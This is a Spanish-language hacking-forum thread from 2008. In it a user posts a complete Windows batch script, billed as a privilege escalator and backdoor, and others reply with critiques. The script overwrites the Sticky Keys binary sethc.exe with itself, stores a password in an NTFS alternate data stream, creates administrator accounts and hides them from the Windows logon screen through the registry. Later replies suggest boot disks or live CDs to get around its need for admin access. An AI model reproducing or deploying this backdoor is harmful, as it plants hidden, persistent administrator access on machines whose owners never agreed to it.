Escalador de Privilegios - Backdoor - by :: SmartGenius ::

Iniciado por SmartGenius, 6 Mayo 2008, 03:41 AM

0 Miembros y 2 Visitantes están viendo este tema.

SmartGenius

Este es un code que estoy realizando...

mode con cols=70
mode con lines=20
@echo off
title Escalador de Privilegios
color 0a

if exist "%windir%\system32\sethc.lz0" (goto load) else (goto ins)

:ins
echo.
echo  Aun no se ha modificado el Sistema..
echo.
echo  Presione una Tecla para realizar el Procedimiento, o salga
echo  del programa si lo desea...
pause > nul
copy "%windir%\system32\sethc.exe" "%windir%\system32\sethc.lz0"
del /f "%windir%\system32\sethc.exe"
copy %0 "%windir%\system32\sethc.exe"
echo ni7vyk3t3hd2mkniyk3nnit>>"%windir%\system32\shell32.dll:admin.cuh"
cls
echo.
echo   ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo   º El cambio del archivo del Sistema usado para º
echo   º la Escalada de privilegios se ha realizado   º
echo   º satisfactoriamente, tendra efecto la proxima º
echo   º vez que vaya a Iniciar sesion...             º
echo   ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
echo  Desea ver la Ayuda del Programa: Si [s] No [N]
echo.
set /p opc="> "
if %opc%==s call :help 2
if %opc%==S call :help 2
if %opc%==n (echo.&echo  Gracias por Usar este Programa&pause&exit)
if %opc%==N (echo.&echo  Gracias por Usar este Programa&pause&exit)

:load
cls
for /F "tokens=*" %%a in (%windir%\system32\shell32.dll:admin.cuh) do set conf=%%a
echo.
echo           ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo           º  Escalada de Privilegios - CUH el-hacker.com º
echo           ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
echo. El Programa se encuentra Protegido
echo. Por Favor Introduzca su Clave!
set /p q="Password > "
call :cript %q%
if %v%==%conf% (goto ini) else (cls&echo.&echo  Clave Invalida...&echo.&echo  Vuelva a Intentarlo&pause&goto load)

:ini
cls
echo.
echo           ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo           º  Escalada de Privilegios - CUH el-hacker.com º
echo           ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
echo    Elija una Opcion:
echo.
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿          ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³1³ ³ Agregar un Usuario.. ³          ³2³ ³ Esconder un usuario. ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ          ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿          ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³3³ ³ Eliminar un Usuario. ³          ³4³ ³ Ver Ayuda - Creditos ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ          ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³5³ ³ Salir del Programa.  ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo.
set /p opc="> "
if "opc"=="" (goto :ini)
set opc=%opc: =_%
set opc=%opc:&=_%
set opc=%opc:¡=_%

if %opc%==1 goto addadmin
if %opc%==2 goto hideuser
if %opc%==5 goto fin
if %opc%==4 call :help 1
if %opc%==3 (goto :delete) else (goto :err)

:err
cls
echo.
echo  ERROR...
echo.
echo  No ha escogido una Opcion Correcta
echo  Vuelva a Intentarlo
echo.
pause
goto ini

:addadmin
cls
echo.
echo   ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo    Escriba el Nombre del Nuevo usuario   
echo   ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set /p admin="> "
echo.
echo      Escriba el la Clave para el Usuario: %admin%
echo.
set /p clave="> "
net user "%admin%" "%clave%" /add
net localgroup Administradores %admin% /add
echo.
echo    ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo    º       Usuario Agregado Con Exito         º
echo    ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
pause >nul
goto ini

:delete
cls
echo.
echo  Escriba El Nombre Del Usuario a Borrar:
echo.
set /p usdel="> "
net user "%usdel%" /delete
cls
echo.
echo  Usuario Borrado Con Exito.
echo.
pause
goto ini

:hideuser
echo.
echo  Escrilba la Cuenta o Nombre de Usuario
echo  que desea esconder de la pantalla de
echo  Inico de Sesion...
echo.
set /p hiden="> "
reg add "HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccount\UserList" /v "%hidden%" /t REG_DWORD /d 0 /f
echo.
echo  El Usuario %hidden% fue Ocultado con Exito...
echo.
pause
goto ini

:help
cls
echo.
echo           ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo           º  Escalada de Privilegios - CUH el-hacker.com º
echo           ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
echo  sección de Ayuda
echo  ____________
echo  ____________
echo  ____________
echo  ____________
echo  Como se pueden dar cuenta, soy malo para las ayudas,
echo  asi que podrian ayudarme ustedes...
echo.
echo   :: SmartGenius :: - powered by iSmart, Corp.
echo.
echo  Presione Cualquier tecla para continuar ¡
pause > nul
if %1==1 set ir=ini
if %1==2 set ir=fin
goto %ir%

:cript
set v=%1
set v=%v:&=_%
set v=%v: =_%
set v=%v:^=_%
set v=%v:#=_%
set v=%v:-=t%
set v=%v:.=a%
set v=%v:a=23%
set v=%v:e=ni%
set v=%v:h=r%
set v=%v:r=y%
set v=%v:c=mo%
set v=%v:d=z%
set v=%v:1=+%
set v=%v:2=k%
set v=%v:b=na%
set v=%v:d=15%
set v=%v:m=t3%
set v=%v:o=sm%
set v=%v:s=hd2%
set v=%v:l=7v%
goto :eof

:fin
echo MsgBox "Gracias por usar este Programa... ;)"^&vbCrLf^&vbCrLf^&"Para mas Info visita"^&vbCrLf^&"http://foro.elhacker.net", 64, "Escalador de Privilegios" >>%temp%\msgr.vbs
start %temp%\msgr.vbs
exit


El pass del programa: Adivinenlo  ;D ;D

Espero que lo prueben y comenten, pros, contras, errores, arreglos, ayudas, mejoras...

Saludos.


leogtz

Hola SmartGenius, yo creo que estaria bien que pusieras unos Errorlevel´s al usar los comandos Net, ya que habra veces en las que no siempre se podra agregar o eliminar un usuario, etc.

Saludos.
Código (perl) [Seleccionar]

(( 1 / 0 )) &> /dev/null || {
echo -e "stderrrrrrrrrrrrrrrrrrr";
}

http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com

Crazy.sx

Destruir K. LOL

No_NICK

       Tan solo me gustaría que me respondieras una pregunta ¿ Lo puedes utiliza si no estas logeado como Administrador por ejemplo que estés como invitado ???



Saludos...


SmartGenius

Cita de: RockoX en  6 Mayo 2008, 06:20 AM
Hola SmartGenius, yo creo que estaria bien que pusieras unos Errorlevel´s al usar los comandos Net, ya que habra veces en las que no siempre se podra agregar o eliminar un usuario, etc.

Saludos.

Aun no tengo muy claro el manejo de errorlevel, pero si tu puedes ayudarme, pues bienvenido sea...


Cita de: No_NICK en  7 Mayo 2008, 02:12 AM
       Tan solo me gustaría que me respondieras una pregunta ¿ Lo puedes utiliza si no estas logeado como Administrador por ejemplo que estés como invitado ???


Bueno, pues el codigo basicamente es para que reemplace a sethc, por si mismo (ya encapsulado en exe)... y asi al moemento de iniciar sesion uno presiona 5 veces shift y tiene acceso al programa que nos permite crearnos una cuenta de admin...

Siendo invitado no estoy seguro de su funcionamiento, pero hay otra forma de escalar privilegios con el comando at que funciona con cualquiera, de ahi podriamos tomar una base para mejorar el codigo y hacerlo mas efectivo...

Saludos.


No_NICK

    Ok... :: SmartGenius ::   fíjate para que funcione es necesario tener acceso local a la máquina durante una sesión de Administrador...

        Seria tonto entonces utilizar ese BAT pues si ya tienes una sección como administrador para que te vas a tomar la molestia de ejecutarlo ?

        Para que tú script tenga una utilidad Verdadera tendrías que crearte un cd, PenDriver ó Diskette de arranque de manera que cuando reinicies puedas modificar el archivo, otra opción seria iniciar sección con un CD de Linux Live y accedes a la partición de Windows y modificas ( en este ultimo caso no te servirá de mucho el .BAT que estas creando)

        Al igual que el comando at solo serviría si solo si eres administrador y tienes acceso local a la maquina

       Ahora bien si lo que deseas es hacer una herramienta que sirva para cambiar el password del administrador en caso de perdida "que es mas o menos lo que tienes ahora"  para nada sera un "Escalador de Privilegios"

       Saludos amigo, Espero no desanimarte....


...

MK-Ultra

Cita de: No_NICK en  9 Mayo 2008, 02:22 AM
Para que tú script tenga una utilidad Verdadera tendrías que crearte un cd, PenDriver ó Diskette de arranque de manera que cuando reinicies puedas modificar el archivo, otra opción seria iniciar sección con un CD de Linux Live y accedes a la partición de Windows y modificas ( en este ultimo caso no te servirá de mucho el .BAT que estas creando)

Agregale que necesitarías acceso físico a la máquina xD
Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ